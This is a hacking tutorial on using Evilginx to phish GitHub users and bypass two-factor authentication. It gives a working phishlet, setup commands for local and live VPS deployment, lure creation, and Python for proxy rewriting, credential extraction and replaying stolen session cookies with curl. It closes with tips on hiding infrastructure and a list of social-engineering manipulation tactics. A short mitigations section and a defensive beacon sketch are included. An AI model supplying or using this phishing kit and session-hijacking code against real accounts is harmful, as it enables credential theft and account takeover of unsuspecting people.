To limit the damage done by stolen passwords, many services have adopted two-factor authentication (2FA). With 2FA the user proves their identity not only with a username and password (the first factor), but also with a second factor, such as a one-time code delivered to a device they control, typically a phone. This makes it considerably harder for an attacker to take over accounts such as email, Facebook or Twitter with a stolen password alone.
Almost all major hacking groups, including the NSA and Sandworm, use social engineering to get a foothold in large information systems.
In this guide, we will see how Evilginx can capture the credentials, and more importantly the authenticated session, of a user who has 2FA enabled.
As you probably already know, phishing is when someone tries to steal important information such as usernames, passwords, credit card numbers or bank details. This is usually done by pretending to be a trusted party, such as a bank or a popular website, and tricking people into handing over their sensitive data. It is like a fisherman using bait to catch fish: the attacker uses a fake message or fake website to lure the victim.
Evilginx takes phishing a step further by proxying the communication between the user and the legitimate website. It performs a man-in-the-middle (more precisely, adversary-in-the-middle) attack: it sits between the victim's browser and the real site and relays traffic in both directions. When the user enters their login details on what looks like the real site, Evilginx records them in transit.
What makes Evilginx particularly powerful is that it defeats most forms of two-factor authentication (2FA). Normally 2FA adds a layer of security by requiring a temporary code sent to the user's phone or email, a push approval, or a biometric check in addition to the password. Evilginx does not fake the 2FA prompt; it relays the real one. The victim types their password and then their code into the genuine site, the site issues an authenticated session cookie, and that cookie passes back through the proxy, where it is recorded. Whoever holds the cookie is logged in, with no need to know the password or the second factor again. The one common exception is origin-bound authentication such as FIDO2/WebAuthn security keys and passkeys, which refuse to sign for the phishing domain; codes typed by a human, SMS and push approvals have no such protection.
How Evilginx works
Before entering combat, you need to understand your weapon, know how to keep it in good working order, and understand its strengths and weaknesses. So let's take a look at how Evilginx works.
Evilginx does not serve its own look-alike HTML pages the way traditional phishing kits do. Instead, it acts as a reverse proxy. Every HTTP request from the victim's browser is intercepted, modified and forwarded to the real website, and every response from the website is intercepted, modified and sent back to the victim. With Evilginx you do not need to build HTML templates: from the victim's side everything looks like the legitimate website, served over a valid TLS certificate for the phishing domain. The user has no idea that Evilginx is sitting in the middle, inspecting each request and recording usernames, passwords and, most importantly, session cookies.
The process works like this:
- The attacker sets up Evilginx on a server they control and generates a phishing link (Evilginx calls it a lure).
- They send this link to the victim by email or text message.
- When the victim opens the link, they see the real site's login page, served through the Evilginx proxy on the attacker's domain.
- The victim enters their username and password. If the account has two-factor authentication, they complete that step too, against the real site.
- Once logged in, the victim is redirected to the legitimate website and carries on as usual.
- The attacker now has the victim's username, password and session cookies. Importing the cookies into their own browser gives them full control of the account; the second factor is not asked for again, because the session is already authenticated.
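Here is what that rewriting looks like in practice, as an added example in Python (not Evilginx's own code, which is written in Go). It models one proxied login POST and the site's redirect-plus-cookie reply. The hostname mapping, the sample traffic and the set of headers touched are assumptions written from the description above; the phishing domain is the one used later in this guide.

```python
"""Model of the request/response rewriting an Evilginx-style reverse proxy does.
Added example, not Evilginx's own code. The hostnames and the sample traffic are
constructed: 'security-update-v102.com' is the phishing domain used in this guide,
'github.com' the target it impersonates."""
import re

# Assumed mapping between phishing hostnames and the real ones. Everything the
# target page loads from these hosts must go through the proxy, which is why
# the phishlet later lists api.github.com and github.githubassets.com too.
PHISH_TO_ORIG = {
    "security-update-v102.com": "github.com",
    "api.security-update-v102.com": "api.github.com",
    "github.security-update-v102.com": "github.githubassets.com",
}
ORIG_TO_PHISH = {v: k for k, v in PHISH_TO_ORIG.items()}

# Response headers the proxy drops so the browser does not block the rewritten
# page (a CSP listing github.com would reject scripts from the phishing host).
DROPPED_RESPONSE_HEADERS = {"content-security-policy", "content-security-policy-report-only"}


def swap_hosts(text, mapping):
    """Replace each hostname in `mapping` with its counterpart. Longest names go
    first so 'api.github.com' is not mangled by the shorter 'github.com' rule; a
    leading dot is allowed so cookie scopes like 'Domain=.github.com' match."""
    for src in sorted(mapping, key=len, reverse=True):
        text = re.sub(r"(?<![\w-])" + re.escape(src) + r"(?![\w-])", mapping[src], text)
    return text


def _each(value):
    return value if isinstance(value, list) else [value]


def rewrite_request(req):
    """Victim -> proxy -> real site. The request is re-addressed so the real site
    sees an ordinary request for itself; Accept-Encoding is dropped so the
    response comes back uncompressed and can be edited."""
    out = {"method": req["method"], "path": req["path"], "headers": {},
           "body": swap_hosts(req.get("body", ""), PHISH_TO_ORIG)}
    for name, value in req["headers"].items():
        low = name.lower()
        if low == "accept-encoding":
            continue
        if low in ("host", "origin", "referer"):
            value = [swap_hosts(v, PHISH_TO_ORIG) for v in _each(value)]
            value = value[0] if len(value) == 1 else value
        out["headers"][name] = value
    return out


def rewrite_response(resp):
    """Real site -> proxy -> victim. Redirects, cookie scopes and links are pointed
    back at the phishing domain so the browser keeps talking to the proxy. The
    proxy sees every Set-Cookie in the clear here, before rewriting it."""
    out = {"status": resp["status"], "headers": {},
           "body": swap_hosts(resp.get("body", ""), ORIG_TO_PHISH)}
    for name, value in resp["headers"].items():
        low = name.lower()
        if low in DROPPED_RESPONSE_HEADERS:
            continue
        if low in ("location", "set-cookie"):
            value = [swap_hosts(v, ORIG_TO_PHISH) for v in _each(value)]
            value = value[0] if len(value) == 1 else value
        out["headers"][name] = value
    return out


# Constructed sample traffic: the victim submits the login form, the real site
# answers with a redirect and session cookies.
SAMPLE_REQUEST = {
    "method": "POST", "path": "/session",
    "headers": {"Host": "security-update-v102.com",
                "Origin": "https://security-update-v102.com",
                "Referer": "https://security-update-v102.com/login",
                "Accept-Encoding": "gzip, br",
                "Content-Type": "application/x-www-form-urlencoded"},
    "body": "login=alice&password=hunter2&return_to=https://security-update-v102.com/",
}
SAMPLE_RESPONSE = {
    "status": 302,
    "headers": {"Location": "https://github.com/",
                "Set-Cookie": ["user_session=abc123; Domain=.github.com; Path=/; Secure; HttpOnly",
                               "logged_in=yes; Domain=.github.com; Path=/; Secure"],
                "Content-Security-Policy": "default-src 'self' https://github.githubassets.com"},
    "body": '<a href="https://api.github.com/v3">api</a>'
            '<script src="https://github.githubassets.com/app.js"></script>',
}

if __name__ == "__main__":
    print(rewrite_request(SAMPLE_REQUEST))
    print(rewrite_response(SAMPLE_RESPONSE))
```

The point to notice is in rewrite_response: the real site's Set-Cookie headers arrive at the proxy in the clear, and the proxy has to rewrite their Domain attribute to the phishing domain anyway so the browser will store them. Everything needed to steal the session is already in its hands at that moment.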
Now, let's look at the main features of this software:
- Evilginx is a platform for running phishing campaigns against many online services; each target is described by a phishlet.
- Its signature feature is bypassing two-factor authentication, by capturing the authenticated session rather than the second factor itself.
- It intercepts and stores session cookies in a form that can be imported straight into a browser.
- It is built with modularity and customization in mind, so phishlets and lures can be adapted to different campaigns and the captured data fed into other tools and frameworks.
However, there are ways to mitigate the risk posed by Evilginx, and they are worth knowing whether you attack or defend:
- Developers can have the page itself verify that it is being displayed on the expected domain and refuse to proceed (or raise an alert) when it is not. Since Evilginx can rewrite strings in proxied responses, such a check must not embed the expected hostname as a plain string the proxy can swap out.
- Verification codes can be hidden and revealed dynamically by client-side code, which makes proxying the flow harder.
- Binding the session to the TLS channel (token binding) adds an extra layer, because a cookie replayed over a different connection is then useless.
- Including secret, session-bound tokens in the login POST request raises the bar further.
- Phishing-resistant second factors (FIDO2/WebAuthn security keys and passkeys) are the only option that stops the attack outright, because the browser refuses to sign for any origin other than the real one.
- Older Evilginx releases added an "X-Evilginx" HTTP header to every proxied request, which could be used for detection; that header was removed in later releases, so do not rely on it as a signal today.
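The first and fourth items above can be combined into one check. Here is an added Python sketch of the server side, not code from Evilginx or from any real site: the login page carries a nonce and a MAC, a small script reports the hostname the browser actually loaded the page from, and the login handler only accepts a POST whose nonce was confirmed on the expected hostname. The endpoint name, the expected hostname and the key are assumptions.

```python
# Added example of the "verify the domain in the page" and "secret token in the
# login POST" mitigations listed above; not code from Evilginx or any real site.
# The /beacon endpoint, the expected hostname and the key are assumptions.
import hashlib
import hmac
import secrets
import time

EXPECTED_HOST = "github.com"          # the legitimate origin (assumed)
SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret (assumed)

# Script the real site embeds in its login page next to the challenge C. It
# never contains the expected hostname as a string, only what the browser
# itself reports, so a plain search-and-replace cannot fix it up.
CLIENT_JS = """
fetch('/beacon', {method: 'POST', headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({nonce: C.nonce, ts: C.ts, tag: C.tag, host: location.hostname})});
"""


def _tag(key, nonce, ts):
    return hmac.new(key, f"{nonce}:{ts}".encode(), hashlib.sha256).hexdigest()


def issue_challenge(key=SERVER_KEY, now=None):
    """Per-page-load nonce plus a MAC proving this server issued it."""
    nonce = secrets.token_hex(16)
    ts = int(time.time() if now is None else now)
    return {"nonce": nonce, "ts": ts, "tag": _tag(key, nonce, ts)}


class BeaconGate:
    """Server side: a login POST is honoured only if the page that produced it
    reported the expected hostname for the same nonce within max_age seconds."""

    def __init__(self, key=SERVER_KEY, max_age=300):
        self.key, self.max_age, self.verified = key, max_age, set()

    def record_beacon(self, report, now=None):
        ts_now = int(time.time() if now is None else now)
        if abs(ts_now - int(report["ts"])) > self.max_age:
            return False  # stale or replayed challenge
        if not hmac.compare_digest(_tag(self.key, report["nonce"], report["ts"]), report["tag"]):
            return False  # not a challenge this server issued
        if report["host"] != EXPECTED_HOST:
            return False  # page ran on another origin, e.g. the proxy's domain
        self.verified.add(report["nonce"])
        return True

    def login_allowed(self, nonce):
        """Called by the login handler with the nonce carried in the POST body."""
        return nonce in self.verified
```

A page relayed through security-update-v102.com reports that hostname, the nonce is never marked as verified, and the login handler can reject the POST and alert on the session. The weakness is obvious once you think like the attacker: Evilginx sub_filters can patch the script itself, for instance replacing location.hostname with a literal, so treat this as a cost-raiser and a telemetry source rather than a blocker. Only origin-bound credentials (WebAuthn) close the hole completely.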
Installation
Generally, to use Evilginx for real you need to register a domain and rent a virtual server. But the basic functionality can be tested without either, inside a Kali Linux virtual machine.
You can install Evilginx in two ways: either by building it from source or, if you're using Kali, by downloading it from the repository. For the second option, just run the following command:
kali> sudo apt install evilginx2 -y
After installing any new tool it is good practice to read its help screen (run it with -h) before using it.
Pay attention to the -developer option: it makes Evilginx generate self-signed TLS certificates for all phishing hostnames, signed by a local CA it creates, instead of requesting real ones from Let's Encrypt. Without it, if you do not yet own a domain with public DNS, the test will not work: the browser will only report that it failed to establish a secure connection. The second important option is -p, the path to your phishlets directory.
Phishlets are small YAML files that configure Evilginx for one target website: which hostnames to proxy, which POST parameters carry the credentials and which cookies make up a logged-in session. By default Evilginx looks for them in the phishlets directory next to its binary; if you installed from the Kali repository, the default path is /usr/share/evilginx/phishlets/.
Local installation
Now we need a domain. I'm assuming you don't have one yet, so we will pick a name and point it at localhost through the /etc/hosts file. The hosts file maps hostnames to IP addresses locally, so the system resolves those names without asking any external DNS server.
In my case I will use the domain security-update-v102.com. Edit the hosts file with any text editor and add a line with the IP address, 127.0.0.1 (localhost), followed by the domain.
Now let's get back to Evilginx.
After installation only the "example" phishlet is listed, and it is disabled. When you start Evilginx for the first time you will also see warnings that the server domain and the server IPv4 address have not been set.
These are the first things to configure, using the domain and address from the hosts file:
: config domain security-update-v102.com
: config ipv4 127.0.0.1
Rather than working from the example file, I found a ready-made phishlet by audibleblink, written for GitHub:
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
  - {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
  - {phish_sub: 'github', orig_sub: 'github', domain: 'github.com'}
sub_filters:
  - {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}
auth_tokens:
  - domain: '.github.com'
    keys: ['logged_in', 'dotcom_user']
  - domain: 'github.com'
    keys: ['user_session', '_gh_sess']
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'github.com'
  path: '/login'
To use it, save it with a .yaml extension in the directory where your other phishlets live; the file name becomes the phishlet name, so github.yaml gives a phishlet called github. The proxy_hosts section also declares the api and github subdomains, so add those to the hosts file as well (api.security-update-v102.com and github.security-update-v102.com, both on 127.0.0.1).
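To see what each section of a phishlet actually does, here is an added Python example (not Evilginx's own code, which is written in Go and uses a full YAML library). It parses the GitHub phishlet above with a small parser for the YAML subset phishlets use, then exercises the four things the file controls: the hostname map from proxy_hosts (whose keys are exactly the names you have to put in the hosts file, or in DNS later), the sub_filters rewrite, credential extraction from a login POST, and the auth_tokens check that decides when a session counts as captured. The sample form body and cookies are constructed.

```python
# Added example, not Evilginx's own code: a parser for the YAML subset phishlets
# use, applied to the GitHub phishlet above, plus the logic each section drives.
# Sample inputs are constructed; real Evilginx is Go and uses a full YAML library.
import re
from urllib.parse import parse_qs
PHISHLET_YAML = """min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
  - {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
  - {phish_sub: 'github', orig_sub: 'github', domain: 'github.com'}
sub_filters:
  - {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}
auth_tokens:
  - domain: '.github.com'
    keys: ['logged_in', 'dotcom_user']
  - domain: 'github.com'
    keys: ['user_session', '_gh_sess']
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'github.com'
  path: '/login'
"""

def _scalar(s):  # true/false, [a, b] lists, quoted or bare strings
    s = s.strip()
    if s in ("true", "false"):
        return s == "true"
    if s[:1] == "[" and s[-1:] == "]":
        return [_scalar(x) for x in s[1:-1].split(",") if x.strip()]
    return s[1:-1] if len(s) > 1 and s[0] == s[-1] and s[0] in "'\"" else s

def _flow_map(s):  # '{k: v, k2: [a, b]}' -> dict; values quoted, bracketed or bare
    return {k: _scalar(v) for k, v in re.findall(r"(\w+):\s*('[^']*'|\"[^\"]*\"|\[[^\]]*\]|[^,}]+)", s)}

def _parse(lines, i, indent):  # lines[i:] at exactly `indent` spaces -> (dict|list, next i)
    out = None
    while i < len(lines):
        cur = len(lines[i]) - len(lines[i].lstrip(" "))
        if cur != indent:
            break
        body = lines[i].strip()
        if body.startswith("- "):
            out, item = (out if out is not None else []), body[2:].strip()
            if item.startswith("{"):
                out.append(_flow_map(item))
                i += 1
            else:  # "- key: v" opens a mapping continued on deeper lines
                lines[i] = " " * (indent + 2) + item
                value, i = _parse(lines, i, indent + 2)
                out.append(value)
        else:
            out = out if out is not None else {}
            key, _, value = body.partition(":")
            if value.strip():
                out[key.strip()], i = _scal(value) if False else _scalar(value), i + 1
            else:
                nxt = len(lines[i + 1]) - len(lines[i + 1].lstrip(" "))
                out[key.strip()], i = _parse(lines, i + 1, nxt)
    return out, i

def parse_phishlet(text):
    return _parse([l.rstrip() for l in text.splitlines() if l.strip()], 0, 0)[0]

def host_map(phishlet, phish_domain):
    # phishing hostname -> real hostname (later proxy_hosts entries win); the keys
    # are exactly the names that need hosts-file lines now or A records later
    return {(h["phish_sub"] + "." if h["phish_sub"] else "") + phish_domain:
            (h["orig_sub"] + "." if h["orig_sub"] else "") + h["domain"]
            for h in phishlet["proxy_hosts"]}

def apply_sub_filters(phishlet, orig_host, mime, body):
    # run every filter that triggers on this response host and MIME type; the
    # filter above strips integrity= so the proxy's edited scripts still load
    for f in phishlet.get("sub_filters", []):
        if f["triggers_on"] == orig_host and mime in f["mimes"]:
            body = re.sub(f["search"], f["replace"], body)
    return body

def extract_credentials(phishlet, post_body):
    """Username/password from a login POST body, per the key/search/type spec."""
    form, creds = parse_qs(post_body), {}
    for which, spec in phishlet["credentials"].items():
        if spec["type"] == "post" and spec["key"] in form:
            m = re.search(spec["search"], form[spec["key"]][0])
            if m:
                creds[which] = m.group(1) if m.groups() else m.group(0)
    return creds

def session_tokens(phishlet, cookies):
    # cookies: (domain, name, value) triples seen in Set-Cookie headers; returns
    # the ones auth_tokens asks for and whether all were seen (session captured)
    wanted = {(t["domain"], k) for t in phishlet["auth_tokens"] for k in t["keys"]}
    got = {(d, n): v for d, n, v in cookies if (d, n) in wanted}
    return got, wanted <= set(got)
```

Two things stand out once the file is machine-readable. The sub_filter is not cosmetic: GitHub ships scripts with Subresource Integrity hashes, and a proxy that rewrites hostnames inside those scripts would break every hash, so the phishlet deletes the integrity attributes from the HTML. And a session is only "done" when all four cookies in auth_tokens have been seen, which is why the tokens list has to match what the real site sets after a full login, 2FA included.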
The next step is to set the hostname for your phishing URL. You can choose any hostname you want, with as many subdomains as you like, as long as it ends in the domain you set with config domain.
In my case I will keep it the same as the server domain (the phishlet is called github here because the file was saved as github.yaml):
: phishlets hostname github security-update-v102.com
Now it's time to enable the phishlet:
: phishlets enable github
Running the phishlets command again shows that the status has changed and the hostname has been added.
The next step is to create a lure. Lures are pre-generated phishing links that you send to your target; each lure is tied to a specific phishlet:
: lures create github
The lure is given an ID automatically, starting at 0. To get its full URL by ID:
: lures get-url 0
You can now open this link in a browser (clear the cache first). You will get a certificate warning, because in developer mode Evilginx uses certificates from its own self-signed CA, which the browser does not trust.
To get rid of the warning, import the Evilginx CA certificate into the browser's trusted authorities; it is at /home/kali/.evilginx/crt/ca.crt.
After that, reload the phishing page.
In the terminal you will see a notification that someone has visited your lure.
If the victim logs in, you get their username, password and session cookies.
When a victim opens the lure URL, Evilginx creates a new session to track the progress of that phishing attempt. As the victim submits the login form through the proxy, the credentials are stored in that session, and once every cookie listed under auth_tokens has been seen the session is marked as captured. The sessions command lists all of them.
Entering sessions followed by the ID shows one in detail, including the captured cookies as JSON.
You can now import those cookies into your own browser with a cookie-editor extension (the JSON matches the format EditThisCookie imports) and then load the site.
After the page reloads, you are logged into the victim's account.
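Importing through a browser extension is the usual route, but the captured JSON can also be used directly. The added Python example below (not Evilginx's own code) converts the export printed by sessions followed by the ID into a cookies.txt that curl accepts with -b, and into a Cookie: header for scripted access; it also applies the domain and host-only rules that decide which cookies go to which host. The field names and the values in the sample export are assumptions modelled on what Evilginx prints.

```python
# Added example, not Evilginx's own code: turns the cookie JSON that the session
# detail view prints into a Netscape cookies.txt for curl and into a Cookie:
# header for a given host. The field names (path, domain, expirationDate, value,
# name, httpOnly, hostOnly) and the cookie values below are assumptions.
import json
import time

SAMPLE_EXPORT = json.dumps([  # constructed, shaped like a captured GitHub session
    {"path": "/", "domain": ".github.com", "expirationDate": 1893456000,
     "value": "yes", "name": "logged_in", "httpOnly": True},
    {"path": "/", "domain": "github.com", "expirationDate": 1893456000,
     "value": "abc123", "name": "user_session", "httpOnly": True, "hostOnly": True},
    {"path": "/", "domain": ".github.com", "expirationDate": 1893456000,
     "value": "alice", "name": "dotcom_user"},
])


def _live(cookies, now):
    """Drop cookies whose expiry has already passed (0 = session cookie, kept)."""
    return [c for c in cookies if not c.get("expirationDate") or int(c["expirationDate"]) >= now]


def to_netscape(export_json, now=None):
    """Netscape format: domain, subdomain flag, path, secure, expiry, name, value,
    tab-separated. curl reads and writes HttpOnly cookies with a '#HttpOnly_'
    prefix on the domain field. Secure is set because the tokens came over HTTPS."""
    now = int(time.time() if now is None else now)
    lines = ["# Netscape HTTP Cookie File"]
    for c in _live(json.loads(export_json), now):
        domain = ("#HttpOnly_" if c.get("httpOnly") else "") + c["domain"]
        subdomains = "TRUE" if c["domain"].startswith(".") else "FALSE"
        lines.append("\t".join([domain, subdomains, c.get("path", "/"), "TRUE",
                                str(int(c.get("expirationDate", 0))), c["name"], c["value"]]))
    return lines


def _matches(cookie_domain, host):
    """Domain cookies (leading dot) cover the domain and its subdomains;
    host-only cookies cover exactly one host."""
    if cookie_domain.startswith("."):
        return host == cookie_domain[1:] or host.endswith(cookie_domain)
    return host == cookie_domain


def cookie_header(export_json, host, now=None):
    """Value for a Cookie: request header when replaying the session against `host`."""
    now = int(time.time() if now is None else now)
    pairs = [f"{c['name']}={c['value']}" for c in _live(json.loads(export_json), now)
             if _matches(c["domain"], host)]
    return "; ".join(pairs)


if __name__ == "__main__":
    with open("cookies.txt", "w") as f:
        f.write("\n".join(to_netscape(SAMPLE_EXPORT)) + "\n")
    print(cookie_header(SAMPLE_EXPORT, "github.com"))
```

With the file written, curl -b cookies.txt https://github.com/ replays the session exactly as the browser extension would. Note that user_session is host-only, so it is sent to github.com but not to api.github.com; getting these scoping rules wrong is the usual reason a replayed session "mysteriously" logs out on the first subdomain request.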
How will we cover our tracks?
For a real engagement you cannot run this from your own machine. You must purchase:
- a virtual server (AWS, DigitalOcean, GoDaddy or any other provider);
- a domain name (Namecheap, Hostinger, Bluehost, etc.).
After buying the VPS you will have a public IPv4 address to point the domain at. In your registrar's DNS zone editor, create A records for the necessary hostnames, just as we did in the hosts file. For the GitHub phishlet that means the bare domain plus the api and github subdomains defined in the YAML. Evilginx requests Let's Encrypt certificates for those hostnames itself, so TCP ports 80 and 443 (and UDP 53, which its built-in DNS server uses) must be free on the VPS and reachable from the internet.
After adding the records you may have to wait anywhere from a few minutes to 48 hours for the DNS changes to propagate. You can check progress at https://dnschecker.org/
Installing Evilginx on the virtual server looks the same as locally. On a Kali image use the package as above; on Debian or Ubuntu do not add Kali's repositories (mixing them breaks the system), but build from the GitHub source with Go instead. On the server, start it without -developer so that real certificates are obtained.
The Art of Social Engineering
Let's now take a closer look at social engineering and the concepts you can use to get a target to click a link. The most common social engineering vectors in information technology are:
- Phishing: mass emails designed to trick a fraction of recipients into clicking harmful links. Probably the most common social engineering attack, and increasingly less effective as people learn to recognise it.
- Spear phishing: targeting a single person. It typically involves extensive OSINT to understand the target's interests, needs and motivations. Executed well, it is highly effective.
- Whaling: spear phishing aimed at a very senior or powerful person, such as an executive.
- Vishing: very similar to phishing, but carried out over voice calls.
- Baiting: luring the victim with the promise of something desirable, such as a reward or free content.
- Quid pro quo: Latin for "something for something"; the target is promised a benefit in exchange for information or a service.
In any case, always do thorough reconnaissance and choose the right delivery channel.
The next important step is choosing an influence strategy. Some key ones:
- Reciprocity: people have a natural tendency to be helpful, so if the attacker gives the target something, the target often feels compelled to give something back when asked.
- Obligation: the attacker creates a sense of debt through kindness or friendliness.
- Concession: similar to reciprocity; the attacker asks for more than needed and then "settles" for the real goal (asking for $200 while aiming for $100, then agreeing to $100).
- Scarcity: the attacker manufactures a sense of scarcity so the target acts quickly before the opportunity is lost.
- Authority: the attacker assumes a position of power to pressure the target into revealing information or taking action: "Hello, this is the help desk. We're doing a system update and need your username and password to migrate your account."
- Consensus: the attacker convinces the target that "everyone knows" or "everyone is doing" something, as in "everyone knows bitcoin is about to hit a new record price".
In conclusion
Social engineering is one of every hacker's most powerful tools. Don't overlook it: it will serve you well on your way to becoming a top-class hacker!